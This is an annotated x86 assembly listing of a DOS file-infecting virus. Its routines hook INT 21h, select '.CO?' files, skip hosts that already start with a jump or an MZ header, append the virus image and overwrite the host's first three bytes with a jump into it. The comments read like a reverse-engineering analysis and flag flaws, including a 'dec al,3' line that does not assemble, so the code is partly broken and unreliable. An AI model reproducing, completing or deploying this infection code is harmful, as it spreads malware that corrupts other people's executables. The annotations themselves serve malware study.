; go_virus_infect
; Infection path entered from the resident INT 21h hook (the hook itself is
; outside this view).
; In:    ds:dx presumably = ASCIZ filename of the intercepted call (it is what
;        check_ext scans and open_host passes to 3D02h) -- not established here
;        ah = function number, adjusted back by one below
; Out:   never returns with ret; every path ends in jmp exit_virus_tsr
;        (outside this view)
; Stack: nine registers are pushed here but only one pop happens before
;        leaving, so exit_virus_tsr is presumably what restores the other
;        eight -- verify against that routine
; Note:  check_ext and read_host_3 abort by discarding their own return
;        address and jumping back to exit_virus_memory / exit_host_infected,
;        so they are not plain subroutines.
go_virus_infect:
dec ah ;undo a +1 the hook presumably applied to ah before branching here -- TODO confirm
push ax ;\
push bx ; \
push cx ; \
push dx ; \
push si ; / caller state saved on the stack;
push di ; / restored on the exit path
push ds ; / (exit_virus_tsr, outside
push es ; / this view)
push bp ;/
call check_ext ;returns only for a ".CO?" name, else jumps to exit_virus_memory
call open_host ;INT 21h 3D02h open read/write; handle left in bx
call read_host_3 ;first 3 bytes -> host_3; jumps to exit_host_infected if already marked
call infect_host ;append the image, patch the first 3 bytes to a jump
exit_host_infected:
call close_host ;INT 21h 3Eh on the handle in bx
exit_virus_memory: ;normal path and both abort paths join here
pop ax ;discards the bp pushed above (stack top on every path that reaches here)
jmp exit_virus_tsr ;leave through the resident exit path (outside this view)
;----- This checks the file ext --------------------------------------------
; check_ext
; Scans the name at ds:dx for the first '.' and tests the two bytes after it.
; In:    ds:dx = filename (not validated here)
; Out:   returns with ret only if the two bytes after '.' are "CO"; otherwise
;        discards its own return address and jumps to exit_virus_memory
; Clobb: si, cx, ax, flags
; Note:  the scan is bounded at 0FFh bytes, but when no '.' is found the loop
;        simply falls through into found_ext and tests whatever follows si.
;        Only two letters are compared, so ".COM" is not distinguished from
;        any other ".CO?" name.
check_ext:
push dx
pop si ;si = dx (filename offset)
mov cx,0ffh ;scan at most 255 bytes for the extension dot
find_ext:
mov al,byte ptr ds:[si] ;al = current name byte
cmp al,'.' ;stop at the first '.'
je found_ext
inc si ;next byte
loop find_ext ;cx exhausted -> falls into found_ext without having seen a '.'
found_ext:
inc si ;skip the '.'
mov ax,word ptr ds:[si] ;ax = two bytes after it (little-endian: al = 1st, ah = 2nd)
cmp ax,'OC' ;MASM-style word literal 'OC' = ah:'O', al:'C', i.e. the text "CO"
je found_com_file
pop ax ;drop check_ext's own return address
jmp exit_virus_memory ;not a ".CO?" name: abandon the infection
found_com_file:
ret ;extension accepted; continue in go_virus_infect
;----- This opens a host file -----------------------------------------------
; open_host
; In:    ds:dx = filename; ax = 3D02h (INT 21h open, read/write access) is set here
; Out:   bx = value returned in ax, copied unconditionally -- the carry flag
;        is not checked, so a failed open still leaves something in bx that
;        every later handle-based call will use
; Clobb: ax, bx, flags; fake_dos_function is defined outside this view
open_host:
mov ax,3d02h ;ah = 3Dh open, al = 02h read/write
call fake_dos_function ;presumably issues the INT 21h service selected by ah
mov bx,ax ;bx = handle (no jc / error check)
ret
;----- This closes a host file ----------------------------------------------
; close_host
; In:    bx = handle from open_host
; Out:   nothing used by callers; carry is not checked
; Clobb: ah, flags
close_host:
mov ah,3eh ;INT 21h 3Eh close handle in bx
call fake_dos_function ;defined outside this view
ret
;----- This reads the first 3 bytes from the host ---------------------------
; read_host_3
; Reads the host's first 3 bytes into the host_3 buffer inside the resident
; image and decides whether infection should proceed.
; In:    bx = host handle (from open_host)
; Out:   host_3 = original first 3 bytes; ds and dx restored. Returns normally
;        only if the first byte is neither 0E9h nor 'M'; otherwise it pops its
;        own pushes, discards its own return address and jumps to
;        exit_host_infected (skipping infect_host).
; Clobb: ax, cx, si, flags
; Note:  the buffer offset is virus_len-3 from the start of CS, which only
;        lands on host_3 if virus_start is at offset 0 of the resident
;        segment -- TODO confirm against the loader. Neither the carry flag
;        nor the byte count returned by the read is checked.
read_host_3:
push ds ;caller's ds
push dx ;caller's dx (filename offset)
push cs
pop ds ;ds = resident (code) segment
xor dx,dx
add dx,virus_len
sub dx,3 ;dx = offset of host_3: the last 3 bytes before virus_end (see data block)
push dx ;keep the buffer offset for the check below
mov ah,3fh ;INT 21h 3Fh read from handle bx into ds:dx
mov cx,3 ;3 bytes
call fake_dos_function ;defined outside this view
pop si ;si = buffer offset
mov ah,byte ptr ds:[si] ;ah = host's first byte
cmp ah,0e9h ;0E9h = near JMP opcode: treated as "already carries a jump"
je is_infect
cmp ah,'M' ;'M' of an "MZ" header: an EXE image, not a plain COM file
je is_infect ;(the original comment called this the command.com case)
pop dx ;restore caller's dx
pop ds ;restore caller's ds
ret ;host looks uninfected: continue to infect_host
is_infect:
pop dx ;restore caller's dx
pop ds ;restore caller's ds
pop ax ;drop read_host_3's own return address
jmp exit_host_infected ;skip infect_host, go straight to close_host
;----- This infects the host file -------------------------------------------
; infect_host
; Appends the resident image to the host file, then rewrites the host's
; first 3 bytes as a near jump whose displacement is derived from the
; pre-append file length.
; In:    bx = host handle; host_3 already holds the host's original first
;        3 bytes (filled by read_host_3), so the appended copy carries them
; Out:   ds, dx restored
; Clobb: ax, cx, si, flags
; Note:  the carry flag and byte counts of both writes are ignored. Only the
;        low word of the seek result (ax) is used; dx is discarded, so file
;        lengths that do not fit in 16 bits are not handled. The line
;        `dec al,3` gives `dec` two operands, which the instruction does not
;        take -- it will not assemble as written, so the exact adjustment
;        applied to the displacement is not established by this listing
;        (the surrounding comments only suggest a 3-byte correction).
;        Like read_host_3, this assumes virus_start is at offset 0 of CS.
infect_host:
push ds ;caller's ds
push dx ;caller's dx
call lseek_end ;ax = low word of file length (position at end)
push ax ;keep it for the displacement
push cs
pop ds ;ds = resident segment
mov ah,40h ;INT 21h 40h write to handle bx from ds:dx
mov cx,virus_len ;whole image
xor dx,dx ;from offset 0 of the segment
call fake_dos_function ;append the image (no error check)
call lseek_start ;back to file offset 0
xor dx,dx
add dx,virus_len
sub dx,3 ;dx = offset of host_3 (last 3 bytes before virus_end)
mov si,dx ;si = the 3-byte patch buffer
mov ah,0e9h ;near JMP opcode
mov byte ptr ds:[si],ah ;patch[0] = E9 (overwrites the saved original byte)
pop ax ;ax = file length low word
dec al,3
mov word ptr ds:[si+1],ax ;patch[1..2] = displacement
mov dx,si ;write the 3-byte patch ...
mov cx,3
mov ah,40h ;... over the host's first 3 bytes
call fake_dos_function ;no error check
pop dx ;restore caller's dx
pop ds ;restore caller's ds
ret
;----- This seeks to the start or end of the host ---------------------------
; lseek_end / lseek_start / lseek
; INT 21h 42h with offset cx:dx = 0; al selects the origin (02h = end of
; file, 00h = start).
; In:    bx = host handle
; Out:   whatever fake_dos_function leaves in ax/dx; infect_host relies on ax
;        holding the low word of the new file position after lseek_end
; Clobb: ax, cx, dx, flags
; Note:  lseek_end reaches the shared tail with jmp; lseek_start falls
;        through into it.
lseek_end:
mov ax,4202h ;ah = 42h seek, al = 02h relative to end
jmp lseek
lseek_start:
mov ax,4200h ;ah = 42h seek, al = 00h relative to start
lseek:
xor dx,dx ;offset low word = 0
xor cx,cx ;offset high word = 0
call fake_dos_function ;defined outside this view
ret
;----- From here down is were all the data for virus is stored!! ------------
; Data carried inside the image. Layout matters: host_3 must be the last 3
; bytes before virus_end, because read_host_3 and infect_host locate it as
; virus_len-3 rather than by name.
data1:
old_21h dd 0 ;saved original INT 21h vector (far pointer); presumably stored by code outside this view
host_3 db 3 dup(90h) ;original first 3 bytes of the host; 90h (NOP) placeholder in the image
virus_end:
virus_len equ virus_end - virus_start ;total image length; virus_start is defined outside this view
data_start equ data1 - virus_start ;offset of this data area within the image
new_21 equ new_21h - virus_start ;offset of new_21h (presumably the resident INT 21h handler) within the image